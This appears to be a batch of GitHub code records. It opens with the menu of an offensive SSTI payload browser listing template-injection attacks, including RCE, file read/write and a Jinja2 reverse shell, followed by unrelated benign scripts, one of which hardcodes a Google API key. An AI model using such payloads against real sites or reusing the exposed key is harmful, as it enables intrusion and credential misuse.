'Twig_Basic_2', 'Twig_File_Read', 'Smarty_Version', 'Smarty_C2', 'Freemarker_Basic_1', 'Freemarker_Basic_2',\n 'Freemarker_RCE_1', 'Freemarker_RCE_2', 'Freemarker_RCE_3', 'Pebble_Basic_1','Pebble_Basic_2','Pebble_RCE',\n 'JinJa2_Basic_1','JinJa2_Basic_2','JinJa2_File_Read','JinJa2_File_Write','JinJa2_POpen_Reverse_Shell',\n 'JinJava_Basic','JinJava_RCE','ASP_.NET_Razor','ASP_.NET_Razor_RCE'\n )\n options = [i for i in ssti if i.startswith(text)]\n if state < len(options):\n return options[state]\n else:\n return None\n\n\ndef PickPayload():\n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer(complete)\n print(\"\\t**************************************************\\n\")\n choice = input(\"\\tWhich Payload do you want to use?: \")\n\n for attack in root.findall('attack'):\n name = attack.find('name').text\n code = attack.find('code').text\n desc = attack.find('desc').text\n if name == 
choice:\n print(\"\\tName of SSTI Attack: \" + m.bcolors.ERROR + m.bcolors.BOLD + name + m.bcolors.ENDC)\n print(\"\\n\\n\\tThe C0de is: \" + m.bcolors.ERROR + m.bcolors.BOLD + code + m.bcolors.ENDC)\n print(\"\\n\\n\\tDescription of attack: \" + m.bcolors.ERROR + m.bcolors.BOLD + desc + m.bcolors.ENDC)\n input(\"Press any key to go back to the menu!\")\n\ndef SSTI():\n os.system(\"clear\")\n while (1):\n print(m.bcolors.BLUE + \"\\t*******************************************************************\" + m.bcolors.ENDC)\n print(m.bcolors.BOLD + m.bcolors.GREEN + \"\"\"\n *******************************************************************\n _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ / \\ \n ( S | S | T | I ) ( P | a | y | l | o | a | d ) ( M | e | n | u )\n \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \\_/ \n \"\"\" + m.bcolors.ENDC)\n\n print(\n m.bcolors.ERROR + \"\\t*******************************************************************\" + m.bcolors.ENDC)\n print(\"\\t(1)\\tList SSTI Payloads\")\n print(\"\\t(2)\\tPick SSTI Payload\")\n print(\"\\t(99)\\tGo back to the Custom Main Menu\")\n print(m.bcolors.BLUE + \"\\t*******************************************************************\" + m.bcolors.ENDC)\n\n options = input(\"\\nW4@+ Payload R U W@^t1ng Broliath: \")\n if options == \"1\":\n ListPayload()\n elif options == \"2\":\n PickPayload()\n elif options == \"99\":\n os.system(\"clear\")\n break\n else:\n input(\"GO CHIEFS! Come on pick something... \")\n\n","repo_name":"Marantral/aMALgamous","sub_path":"Mod/Web/SSTI/ssti.py","file_name":"ssti.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"29"} +{"seq_id":"42849793421","text":"class Graph:\n def __init__(self, data):\n # create graph\n # convert lines data to graph\n self.data = convertToGraph(data)\n self.count = len(data)\n\n\ndef topologicalSort(data, result):\n # base, if dictionary is empty, result\n if len(data) == 0:\n return result\n\n # local result, conquer this sub problem\n res = []\n # check for empty prerequisite node (we can register to this course in this semester)\n for key in data:\n # if empty\n if (len(data[key]) == 0):\n # add to local result\n res.append(key)\n\n # decrease dictionary\n # for every course in local result\n for key in res:\n # for every course available in the dictionary\n for item in data:\n # if the data is in local result and also a prerequisite in another course\n if key in data[item]:\n # remove the prerequisite node as we are taking the course this semester\n data[item].remove(key)\n # remove the key, as the course has been taken\n del data[key]\n\n # add local result to global result\n result.append(res)\n\n # recursive to every sub problem\n # with smaller data, and bigger global result\n return topologicalSort(data, result)\n\n\ndef convertToGraph(lines):\n # make dictionary\n result = {}\n for line in lines:\n # process every line, so there is no spaces, dot, and split to list\n line = processLine(line)\n # course\n node = line[0]\n # prerequisite course\n # set dictionary key to be course, and value list of prerequisite course\n result[node] = line[1:]\n\n return result\n\n\ndef processLine(line):\n # remove spaces\n line = line.replace(\" \", \"\")\n # remove .\n line = line.replace(\".\", \"\")\n # convert to list\n line = line.split(\",\")\n return 
line\n","repo_name":"frederon/Stima_Tucil2","sub_path":"Graph_13519134.py","file_name":"Graph_13519134.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71019333519","text":"class Buku :\n def __init__(self, Judul, Pengarang, Penerbit, Tahun) :\n self.Judul = Judul \n self.Pengarang = Pengarang \n self.Penerbit = Penerbit \n self.Tahun = Tahun \n\n def tampil(self) :\n print(\"Judul : \",self.Judul)\n print(\"Pengarang : \",self.Pengarang)\n print(\"Penerbit : \",self.Penerbit)\n print(\"Tahun : \",self.Tahun)","repo_name":"robbyakakom/20221","sub_path":"PBP-SIA-1/pertemuan_7/Buku.py","file_name":"Buku.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"id","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"7574335949","text":"import sys,getopt\r\n\r\ndef main (argv):\r\n InputCondensedFileName = \"\"\r\n OutputCondensedMergedResults = \"\"\r\n print(\"It works\")\r\n\r\n try:\r\n opts, args = getopt.getopt(argv,\"i:o:\",[\"inCondensedfile=\",\"outMergedresults=\"])\r\n except getopt.GetoptError:\r\n print ('cucu.py -i -o ')\r\n sys.exit(2)\r\n for opt, arg in opts:\r\n if opt == '-h':\r\n print ('cucu.py -i -o ')\r\n sys.exit()\r\n elif opt in (\"-i\", \"--inCondensedfile\"):\r\n InputCondensedFileName = arg\r\n elif opt in (\"-o\", \"--outMergedresults\"):\r\n OutputCondensedMergedResults = arg\r\n\r\n print(InputCondensedFileName)\r\n print(OutputCondensedMergedResults)\r\n\r\n inputFileSplit = open(InputCondensedFileName)\r\n outputFile = open(OutputCondensedMergedResults, 'a')\r\n\r\n FirstRow = \"\"\r\n SecondRow = \"\"\r\n ThirdRow = \"\"\r\n\r\n\r\n inputFileSplit.readline()\r\n\r\n FirstRow = inputFileSplit.readline()\r\n SecondRow = inputFileSplit.readline()\r\n ThirdRow = inputFileSplit.readline()\r\n\r\n FirstRowSubAcc = \"\"\r\n FirstRowSubTitle = \"\"\r\n FirstRowCountOfBestHits = \"\"\r\n FirstRowMeanBitScore = \"\"\r\n temporaryList = FirstRow.splitlines()\r\n singleString = temporaryList [0]\r\n splitingList = singleString.split('\\t')\r\n\r\n FirstRowSubAcc = splitingList[0]\r\n FirstRowSubTitle = splitingList[1]\r\n FirstRowCountOfBestHits = splitingList[2]\r\n FirstRowMeanBitScore = splitingList[3]\r\n \r\n temporaryList = SecondRow.splitlines()\r\n singleString = temporaryList [0]\r\n splitingList = singleString.split(\"\\t\")\r\n\r\n SecondRowSubAcc = splitingList[0]\r\n SecondRowSubTitle = splitingList[1]\r\n SecondRowCountOfBestHits = splitingList[2]\r\n SecondRowMeanBitScore = splitingList[3]\r\n \r\n temporaryList = ThirdRow.splitlines()\r\n singleString = temporaryList [0]\r\n splitingList = singleString.split(\"\\t\")\r\n\r\n ThirdRowSubAcc = splitingList[0]\r\n ThirdRowSubTitle = splitingList[1]\r\n ThirdRowCountOfBestHits = splitingList[2]\r\n ThirdRowMeanBitScore = splitingList[3]\r\n \r\n variable_to_hold_spliting_by_backslash = InputCondensedFileName.split(\"\\\\\")\r\n variable_to_hold_size_of_list = len(variable_to_hold_spliting_by_backslash)\r\n pulling_the_last_element = variable_to_hold_spliting_by_backslash [variable_to_hold_size_of_list - 1]\r\n variable_to_hold_Spliting_name_by_underscore = pulling_the_last_element.split(\"_\")\r\n \r\n TargetID = variable_to_hold_Spliting_name_by_underscore[0]\r\n \r\n OutputLineFirstRow = FirstRowSubAcc + \"\\t\" + FirstRowSubTitle + \"\\t\" + FirstRowCountOfBestHits + \"\\t\" + FirstRowMeanBitScore\r\n OutputLineSecondRow = SecondRowSubAcc + \"\\t\" + 
SecondRowSubTitle + \"\\t\" + SecondRowCountOfBestHits + \"\\t\" + SecondRowMeanBitScore\r\n OutputLineThirdRow = ThirdRowSubAcc + \"\\t\" + ThirdRowSubTitle + \"\\t\" + ThirdRowCountOfBestHits + \"\\t\" + ThirdRowMeanBitScore\r\n\r\n OutputLineAll = TargetID + \"\\t\" + OutputLineFirstRow + \"\\t\" + OutputLineSecondRow + \"\\t\" + OutputLineThirdRow + \"\\n\"\r\n\r\n outputFile.write(OutputLineAll)\r\n \r\nif __name__ == \"__main__\":\r\n main(sys.argv[1:])\r\n\r\n\r\n","repo_name":"BTalamantesBecerra/Currito3.1","sub_path":"Currito3.1_cocu.py","file_name":"Currito3.1_cocu.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"30811804105","text":"import random\r\nfrom datetime import datetime\r\nimport json\r\nimport subprocess\r\nimport time\r\nimport urllib.request\r\nimport sqlite3\r\nimport os\r\n\"\"\"\r\n This Program for choosing a Random Episode in Khwater(all_Seasons)\r\n and play it on Youtube (Google chrome)\r\n\"\"\"\r\ndatabase = sqlite3.connect(\"repeated_episodes.db\")\r\nc = database.cursor()\r\n\r\ndef RANDOM():\r\n global Season,Episode\r\n # Get a Random number For both Season & Episode\r\n S = [random.randint(1,12) for item in range(0,12)]\r\n E = [random.randint(1,31) for item in range(0,31)]\r\n #using datetime library to get the current time\r\n now = datetime.now()\r\n date = now.day\r\n day = date\r\n if date >= 12: #To avoid IndexError in case of the date >= 12\r\n if date <= 19:\r\n date = date - 7\r\n else:\r\n date = date - 19\r\n Season = S[date-1]\r\n Episode = E[day-1]\r\n\r\ndef check_if_repeated():\r\n global Season,Episode\r\n RANDOM()\r\n s = Season\r\n e = Episode\r\n c.execute(\"SELECT season,episode FROM data\")\r\n for row in c.fetchall():\r\n if row[0] == Season and row[1] == Episode:\r\n RANDOM()\r\n if Season == s and Episode == e:\r\n c.execute(\"INSERT INTO data (season,episode) VALUES (?,?)\",(s,e))\r\n database.commit()\r\n else:\r\n c.execute(\"INSERT INTO data (season,episode) VALUES (?,?)\",(Season,Episode))\r\n database.commit()\r\n\r\nLinks = {\r\n1:\"PL5EE49DD2D8C38ECE\",\r\n2:\"PLA1D51FAF0DD5845E\",\r\n3:\"PL6C2F3DADE0A1232F\",\r\n4:\"PL467132E986FD1EC9\",\r\n5:\"PL8C23FDC1CB110A08\",\r\n6:\"PL9AF792A465B7FD1D\",\r\n7:\"PLDC04C71919C9A445\",\r\n8:\"PLvKVYdfmki7X6dsNLI88AscMkiAmH8Gjb\",\r\n9:\"PLtQ6jVwjgfV3kJtGgLiQcHjQONJUCZ35I\",\r\n10:\"PLvKVYdfmki7U-vzbMuTEklVotWJF1cUrh\",\r\n11:\"PLvKVYdfmki7XCRIjnidascLtTLwWECEHM\",\r\n12:\"PLjTPwkeuXS8RXFr24Z9kbJM6spnXGxBpS\"\r\n}\r\n\r\ndef getItems(link):\r\n global Season,Episode\r\n apiKey = \"AIzaSyDYRfQ7NkfRh7VjEjmrRPMqiAOaA0wPmx4nOx74Gjhu827Jgspri53B5nb\"\r\n json_format = urllib.request.urlopen(\"https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&playlistId=%s&maxResults=50&key=apiKey\" % link)\r\n json_format_read =json_format.read()\r\n json_format_decode = json_format_read.decode(\"utf-8\")\r\n data = json.loads(json_format_decode)\r\n Vid_Ids = []\r\n for i in data['items']:\r\n Vid_Ids.append(i['snippet']['resourceId']['videoId'])\r\n V_id = Vid_Ids[Episode-1]\r\n Chrome_dist = find(\"chrome.exe\",'C:\\\\')\r\n # subprocess.Popen([r\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\", \"https://www.youtube.com/watch?v=%s\" % V_id ])\r\n subprocess.Popen([\"%s\"% Chrome_dist, \"https://www.youtube.com/watch?v=%s\" % V_id ])\r\n\r\n\r\ndef show():\r\n global Season,Episode\r\n #table()\r\n RANDOM()\r\n check_if_repeated()\r\n if Season == 12:\r\n if 
Episode > 19 :\r\n Episode = Episode - 12\r\n #print(Season,Episode)\r\n getItems(Links[12])\r\n #print(Season,Episode)\r\n getItems(Links[12])\r\n else:\r\n #print(Season,Episode)\r\n getItems(Links[Season])\r\n\r\ndef find(name, path):\r\n for root, dirs, files in os.walk(path):\r\n if name in files:\r\n return os.path.join(root, name)\r\n\r\n\r\nstarting = time.time()\r\n\r\nshow()\r\nc.close()\r\ndatabase.close()\r\n\r\nending = time.time()\r\nprint(ending - starting)\r\n\r\n#Recourses :\r\n#http://stackoverflow.com/questions/35245246/how-can-you-open-a-url-with-a-specified-web-browser-in-python-3\r\n#http://stackoverflow.com/questions/14858879/split-txt-file-to-multiple-files-named-according-to-their-contents-in-python\r\n","repo_name":"dar4kamal/khawater-series","sub_path":"Khwater_Trials.py","file_name":"Khwater_Trials.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20104474138","text":"import socket\n# from lib.c_parse_document import parse_document, word_parse,output_doc,client\nimport _thread as thread\nimport time\nfrom lib.word_parse import word_parse\nfrom lib.parse_document import parse_document\nfrom lib.tclient import client\nfrom lib.output_doc import output_doc\n\n\n\n# def msg_read(con):\n# data = []\n# msg = con.recv(1024)\n# if not msg: break\n# len = msg\n# for i in range(int(len)):\n# msg = con.recv(1024)\n# data.append([ap.parse(msg)])\n# msg = con.recv(1024)\n# client_key = msg\n\n\ndef listen(c,ap,doc):\n con = c.con\n data = []\n FIM = False\n while True:\n st = con.recv(1024)\n if not st: break\n # print(st)\n\n while st == 'server_request\\n':\n print('Processing a server request')\n msg = con.recv(1024)\n if not msg: break\n len_i = msg\n for i in range(int(len_i)):\n msg = con.recv(1024)\n msg,error = ap.parse(msg)\n if error == 0:\n data.append(msg)\n else:\n data.append('error')\n msg = con.recv(1024)\n client_key = msg\n print('Received a server request to another client (server_key = '+ str(client_key)+') to parse the words.')\n print('Parsed data:')\n print('--------------------------')\n for i in range(int(len_i)):\n print(data[i])\n print('--------------------------')\n con.send('client_response\\n')\n con.send(len_i)\n time.sleep(1/1.5)\n for i in range(int(len_i)):\n con.send(str(data[i]))\n time.sleep(1/1.5)\n con.send(str(client_key))\n st = None\n # print(\"FIM\")\n break\n\n while st == 'server_fresponse\\n':\n print('Received a request answer:')\n print('--------------------------')\n msg = con.recv(1024)\n if not msg: break\n len_sr = msg\n for i in range(int(len_sr)):\n msg = con.recv(1024)\n print(msg)\n doc.write_line(msg)\n print('--------------------------')\n FIM = True\n break\n if FIM == True:\n break\n \n \n\n print('Finalizando conexao do cliente')\n con.close()\n thread.exit()\n\n\n\n\nif __name__ == '__main__':\n doc_msg = parse_document(\"modelo_entrada.txt\")\n print('Open archive named: modelo_entrada.txt.')\n doc_msg.read_lines()\n msg_len = len(doc_msg.dictionary)\n print('Document data parsed.')\n\n ap = word_parse()\n\n HOST = '127.0.0.1' # Endereco IP do Servidor\n PORT = 5001 # Porta que o Servidor esta\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n c = client(tcp,'')\n dest = (HOST, PORT)\n tcp.connect(dest)\n print(\"Send request\\n\")\n doc = output_doc(\"testando.txt\")\n tcp.send(b\"client_request\\n\")\n time.sleep(1/1.5)\n tcp.send((str(msg_len) + '\\n').encode('utf-8'))\n 
thread.start_new_thread(listen,tuple([c,ap,doc]))\n time.sleep(1/1.5)\n print('Send the following messages:')\n print('--------------------------')\n for i in range(1,msg_len+1): \n time.sleep(1/1.5)\n tcp.send(str(doc_msg.dictionary['k'+str(i)])+ '\\n' )\n print(str(doc_msg.dictionary['k'+str(i)]))\n print('--------------------------')\n\n while True:\n pass\n\n tcp.close()\n","repo_name":"MSathler/TP_redes","sub_path":"python2/client_requestor.py","file_name":"client_requestor.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"3670879635","text":"import os\n\nfrom .. import NEXRAD_STATION_ID_LIST\n\ndef nexrad_level2_directory(date, station = NEXRAD_STATION_ID_LIST, root = '/data1/' ):\n \"\"\"\n Name:\n nexrad_level2_directory\n Purpose:\n Return the full paths to the local directories containing NEXRAD\n Level 2 data for the specified date and station IDs\n Inputs:\n date : Datetime for which the directory paths are to be created\n Keywords:\n station : Scalar string or string list containing the station IDs\n for which directories are to be created.\n DEFAULT: directories are created for all of the\n stations in the nexrad.NEXRAD_STATION_ID_LIST\n root : Top-level root directory. Default value depends on the\n date of the data selected\n Returns:\n Returns three values:\n - Scalar string or list of strings containing full path(s) to \n directory(s) of Level 2 files for the date and station(s)\n specified\n - The parent directory of the directories returned in first\n return value. This is the full path to those directories\n without the station ID component\n - The full root directory of Level 2 files for the \n specified date\n \"\"\"\n yyyy = date.strftime( '%Y' )\n yyyymm = date.strftime( '%Y%m' ) \n yyyymmdd = date.strftime( '%Y%m%d' ) \n\n root = os.path.join( root, 'NEXRAD', 'level2' )\n parent = os.path.join(root, yyyy, yyyymm, yyyymmdd, '');\n\n if not isinstance(station, (list, tuple,)): station = [station]; # If station variable is NOT a list or tuple, make it a tuple\n\n return [os.path.join( parent, s, '' ) for s in station], parent, root \n","repo_name":"allendawodu/WeatherRadarML","sub_path":"WeatherRadarML/nexrad/utils/nexrad_level2_directory.py","file_name":"nexrad_level2_directory.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73719410318","text":"def thesaurus(*args, sort=False) -> dict:\n \"\"\"Формирует словарь, в котором ключи — первые буквы слов,\n а значения — списки, содержащие слова, начинающиеся с соответствующей буквы\n\n :param *args: перечень слов\n :param sort: признак необходимости сортировки словаря по алфавиту (True - сортировать, False - не сортировать)\n :return: словарь слов по первым буквам\"\"\"\n\n if sort:\n args = sorted(list(args)) # Changed in version 3.7: Dictionary order is guaranteed to be insertion order\n\n dict_out = {}\n for word in args:\n dict_value = dict_out.setdefault(word[0], list())\n if word not in dict_value:\n dict_value.append(word)\n dict_out[word[0]] = dict_value\n\n return dict_out\n\n\nprint(thesaurus(\"Иван\", \"Мария\", \"Петр\", \"Илья\"))\n","repo_name":"Zalotny/GB_Python_Basics_Course","sub_path":"Manzhula_Oleg_dz_3/task_3_3.py","file_name":"task_3_3.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} 
+{"seq_id":"22925802633","text":"\nimport json\nimport requests\nimport time\nimport threading\nimport os\nimport people_counter\n\nclass Quick(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.stop_thread= False\n self.counter = people_counter.PeopleCount(\"prototxt.prototxt\", \"model.caffemodel\", 0.4, 30)\n self.currentDiff = 0\n if(os.path.isfile(\"config.txt\")):\n print(\"Config file found, loading from file..\")\n config = json.load(open(\"config.txt\", \"r\"))\n config = config[0] #json is in array, get first array\n self.idPlace = config['idPlace']\n print(\"Place id is: \" +self.idPlace)\n else:\n print(\"Creating new config..\")\n file = open(\"config.txt\", 'w')\n self.idPlace = raw_input(\"Enter id of place: \")\n config = []\n config.append({'idPlace' : self.idPlace})\n json.dump(config, file)\n\n def run(self):\n self.counter.start()\n self.startUpdater()\n\n def stop(self):\n self.stop_thread = True\n self.counter.stop()\n\n def startUpdater(self):\n while not self.stop_thread:\n time.sleep(10)\n self.currentDiff = self.counter.getIn() - self.counter.getOut()\n self.counter.resetInOut()\n params = {'valueToAdd':self.currentDiff,'placeId':self.idPlace}\n print(self.makeRequest(params))\n\n def makeRequest(self, params):\n httpRequest = requests.post('https://aesuneus.000webhostapp.com/qservice.php', params)\n return httpRequest\n","repo_name":"zarifulradzuan/quick-pi","sub_path":"qclass.py","file_name":"qclass.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"69854650638","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 剑指 Offer 58 - I. 翻转单词顺序.py\n@Time : 2022/05/15 00:30:21\n@Author : henfy\n@Diffi : Easy\n@Method : 双指针\n\n题目:https://leetcode.cn/problems/fan-zhuan-dan-ci-shun-xu-lcof/\n'''\n\n\nclass Solution:\n def reverseWords(self, s: str) -> str:\n # 双指针\n # s = s.strip() # 删除首尾空格\n # # print(s)\n # i = j = len(s)-1\n # res = []\n # while i >= 0:\n # while i >= 0 and s[i] != ' ':\n # i -= 1\n # res.append(s[i+1: j+1])\n # while s[i] == ' ':\n # i -= 1\n # j = i\n # return ' '.join(res)\n\n # 分割 + 倒序\n s = s.strip() # 删除首尾空格\n strs = s.split() # 分割字符串\n strs.reverse() # 翻转单词列表\n return ' '.join(strs) # 拼接为字符串并返回\n\n\nif __name__ == '__main__':\n s = Solution()\n test_list = [\n (\"the sky is blue\", \"blue is sky the\"),\n (\" hello world! \", \"world! hello\"),\n (\"a good example\", \"example good a\")\n ]\n\n for test_index, test_case in enumerate(test_list, start=1):\n *test, result = test_case\n test_result = s.reverseWords(*test)\n if test_result != result:\n raise ValueError(\"\\n testcase %d error:\\n expect: %s \\n actually %s\" % (\n test_index, result, test_result))\n print(\"test_case %d succeed.\" % test_index)\n","repo_name":"henfy233/leetcode","sub_path":"剑指Offer/剑指 Offer 58 - I. 翻转单词顺序.py","file_name":"剑指 Offer 58 - I. 翻转单词顺序.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35378611563","text":"# -*- coding: utf-8 -*-\n\"\"\"ribocount\"\"\"\nimport os\nimport shutil\nimport zipfile\nimport logging\nimport argparse\n\nimport ribocore\nimport config\n\n# Default is production\nCONFIG = config.ProductionConfig()\n\nlog = logging.getLogger('riboplot')\n\n\nclass ErrorLogFormatter(logging.Formatter):\n \"\"\"Custom error log format for the HTML file\"\"\"\n\n def format(self, record):\n return '
<h2>
    RiboCount Error
</h2>
<p>
    {}
</p>
    '.format(record.msg)\n\n\ndef create_parser():\n \"\"\"Argument parser. \"\"\"\n parser = argparse.ArgumentParser(\n prog='ribocount.py', description='Output read counts for all transcripts')\n\n # required arguments\n required = parser.add_argument_group('required arguments')\n required.add_argument('-b', '--ribo_file', help='Ribo-Seq alignment file in BAM format', required=True)\n required.add_argument('-f', '--transcriptome_fasta', help='FASTA format file of the transcriptome', required=True)\n\n # optional arguments\n parser.add_argument('-l', '--read_lengths', help='Read lengths to consider (default: %(default)s). '\n 'Multiple read lengths should be separated by commas. If multiple read lengths '\n 'are specified, corresponding read offsets should also be specified. If you do '\n 'not wish to apply an offset, please input 0 for the corresponding read length',\n default='0', type=ribocore.lengths_offsets)\n parser.add_argument('-s', '--read_offsets', help='Read offsets (default: %(default)s). '\n 'Multiple read offsets should be separated by commas',\n default='0', type=ribocore.lengths_offsets)\n\n count_group = parser.add_mutually_exclusive_group()\n count_group.add_argument('-v', '--count_five', help='Flag. Output reads in 5\\' region', action='store_true')\n count_group.add_argument('-r', '--count_three', help='Flag. Output reads in 3\\' region', action='store_true')\n parser.add_argument('-m', '--html_file', help='Output file for results (HTML)', default='ribocount.html')\n parser.add_argument('-o', '--output_path', help='Files are saved in this directory', default='output')\n parser.add_argument('-d', '--debug', help='Flag. Produce debug output', action='store_true')\n\n return parser\n\n\ndef main(args):\n \"\"\"Main program\"\"\"\n (ribo_file, transcriptome_fasta, read_lengths, read_offsets, count_five, count_three,\n output_path, html_file) = \\\n (args.ribo_file, args.transcriptome_fasta, args.read_lengths, args.read_offsets,\n args.count_five, args.count_three, args.output_path, args.html_file)\n\n log.debug('Supplied arguments\\n{}'.format(\n '\\n'.join(['{:<20}: {}'.format(k, v) for k, v in vars(args).items()])))\n\n # error messages (simple format) are written to html file\n fh = logging.FileHandler(html_file)\n fh.setLevel(logging.ERROR)\n fh.setFormatter(ErrorLogFormatter('%(message)s'))\n log.addHandler(fh)\n\n log.info('Checking if required arguments are valid...')\n ribocore.check_required_arguments(ribo_file=ribo_file, transcriptome_fasta=transcriptome_fasta)\n\n log.info('Checking read lengths...')\n ribocore.check_read_lengths(ribo_file=ribo_file, read_lengths=read_lengths)\n log.info('Done')\n\n log.info('Checking read offsets...')\n ribocore.check_read_offsets(read_offsets=read_offsets)\n log.info('Done')\n\n log.info('Checking if each read length has a corresponding offset...')\n ribocore.check_read_lengths_offsets(read_lengths=read_lengths, read_offsets=read_offsets)\n log.info('Done')\n\n with ribocore.open_pysam_file(fname=ribo_file, ftype='bam') as b, ribocore.open_pysam_file(fname=transcriptome_fasta, ftype='fasta') as f:\n # Total valid transcript count (ones with reads)\n count = 0\n prime = None\n table_body = '' # HTML table body content\n if count_five:\n log.info('Only 5\\' read counts requested')\n prime = '5'\n elif count_three:\n log.info('Only 3\\' read counts requested')\n prime = '3'\n\n # create output directories\n if not os.path.exists(output_path):\n os.mkdir(output_path)\n\n # zip_dir contents will be written here and a zip archive 
will be created\n # from this directory\n zip_dir = os.path.join(output_path, 'ribocount_output')\n if not os.path.exists(zip_dir):\n os.mkdir(zip_dir)\n\n csv_dir = os.path.join(zip_dir, 'csv')\n if not os.path.exists(csv_dir):\n os.mkdir(csv_dir)\n\n log.info('Get RiboSeq read counts for all transcripts in FASTA')\n for transcript in f.references:\n ribo_counts, ribo_reads = ribocore.get_ribo_counts(ribo_fileobj=b, transcript_name=transcript,\n read_lengths=read_lengths, read_offsets=read_offsets)\n if not ribo_reads: # no reads for this transcript. skip.\n continue\n\n transcript_sequence = f[transcript]\n # By default, all counts will be written (ribo_counts)\n # If 5' or 3' counts requested, filter and use\n # those counts for printing instead\n write_counts = ribo_counts\n log.debug('Total read counts {}'.format(ribo_reads))\n\n # find longest ORF and filter counts based on whether 5' or 3' is\n # requested\n longest_orf = {}\n if count_five or count_three:\n # use default start and stop codons and find ORFs in all 3\n # frames (+)\n orfs = ribocore.get_three_frame_orfs(sequence=transcript_sequence)\n if not len(orfs):\n log.debug('No ORFs for transcript {0}'.format(transcript))\n continue\n longest_orf = ribocore.get_longest_orf(orfs=orfs)\n orf_start, orf_stop = longest_orf['start'], longest_orf['stop']\n log.info('Transcript: {0} Longest ORF Start: {1}, Stop: {2}'.format(transcript, orf_start, orf_stop))\n\n if count_five:\n write_counts, five_reads = ribocore.filter_ribo_counts(counts=ribo_counts, orf_start=orf_start)\n log.debug('5\\' region read counts: {}'.format(five_reads))\n elif count_three:\n write_counts, three_reads = ribocore.filter_ribo_counts(counts=ribo_counts, orf_stop=orf_stop)\n log.debug('3\\' region read counts: {}'.format(three_reads))\n\n if not len(write_counts):\n # no counts for transcript\n continue\n\n log.debug('Writing counts to CSV file for transcript {}'.format(transcript))\n count += 1\n csv_file = 'RiboCounts{}.csv'.format(count)\n with open(os.path.join(csv_dir, csv_file), 'w') as cw:\n cw.write('\"Position\",\"Nucleotide\",\"Frame 1\",\"Frame 2\",\"Frame 3\"\\n')\n for pos in range(1, len(transcript_sequence) + 1):\n nucleotide = transcript_sequence[pos - 1]\n if pos in write_counts:\n cw.write('{0},{1},{2},{3},{4}\\n'.format(\n pos, nucleotide, write_counts[pos][1], write_counts[pos][2], write_counts[pos][3]))\n else:\n cw.write('{0},{1},{2},{3},{4}\\n'.format(pos, nucleotide, 0, 0, 0))\n # HTML table\n table_body += '{0}{1}'.format(transcript, ribo_reads)\n if count_five:\n table_body += '{0}'.format(five_reads)\n elif count_three:\n table_body += '{0}'.format(three_reads)\n table_body += '{0}'.format(csv_file)\n table_body += ''\n\n # only for display in HTML\n valid_lengths = ['{}'.format(item) for item in read_lengths]\n if len(valid_lengths) == 1 and valid_lengths[0] == '0':\n valid_lengths = ['All']\n\n if not count:\n if len(valid_lengths) >= 1:\n log.info('No transcripts found for read lengths: {}'.format(', '.join(valid_lengths)))\n else:\n log.info('No transcripts found')\n else:\n if prime:\n template = 'ribocount_prime.html'\n else:\n template = 'ribocount.html'\n with open(os.path.join(CONFIG.PKG_DATA_DIR, template)) as g,\\\n open(os.path.join(zip_dir, 'index.html'), 'w') as h:\n h.write(g.read().format(count=count, length='{}'.format(', '.join(valid_lengths)),\n prime=prime, table_body=table_body))\n\n for asset in ('css', 'js'):\n asset_dir = os.path.join(zip_dir, asset)\n if not os.path.exists(asset_dir):\n os.mkdir(asset_dir)\n 
asset_data_dir = os.path.join(CONFIG.PKG_DATA_DIR, asset)\n for fname in os.listdir(asset_data_dir):\n shutil.copy(os.path.join(asset_data_dir, fname),\n os.path.join(zip_dir, asset, fname))\n\n log.info('Creating zip file')\n os.chdir(output_path)\n with zipfile.ZipFile('ribocount_output.zip', 'w', allowZip64=True) as zipf:\n for root, d, f in os.walk('ribocount_output'):\n for name in f:\n zipf.write(os.path.join(root, name))\n shutil.rmtree('ribocount_output')\n os.chdir('../')\n log.debug('Writing HTML report')\n\n with open(os.path.join(CONFIG.PKG_DATA_DIR, 'ribocount_index.html')) as j, open(args.html_file, 'w') as k:\n k.write(j.read().format(count=count, read_length=', '.join(valid_lengths)))\n log.info('Finished')\n\n\ndef run():\n \"\"\"Run program\"\"\"\n parsed = create_parser()\n args = parsed.parse_args()\n main(args)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"vimalkvn/riboplot","sub_path":"riboplot/ribocount.py","file_name":"ribocount.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"20008772086","text":"import requests\n\nBASE_URL = \"http://127.0.0.1:5000/\"\n'''\ndata = [{\"likes\": 10, \"name\":\"Tim\", \"views\": 100},\n {\"likes\": 210, \"name\":\"Joe\", \"views\": 10220},\n 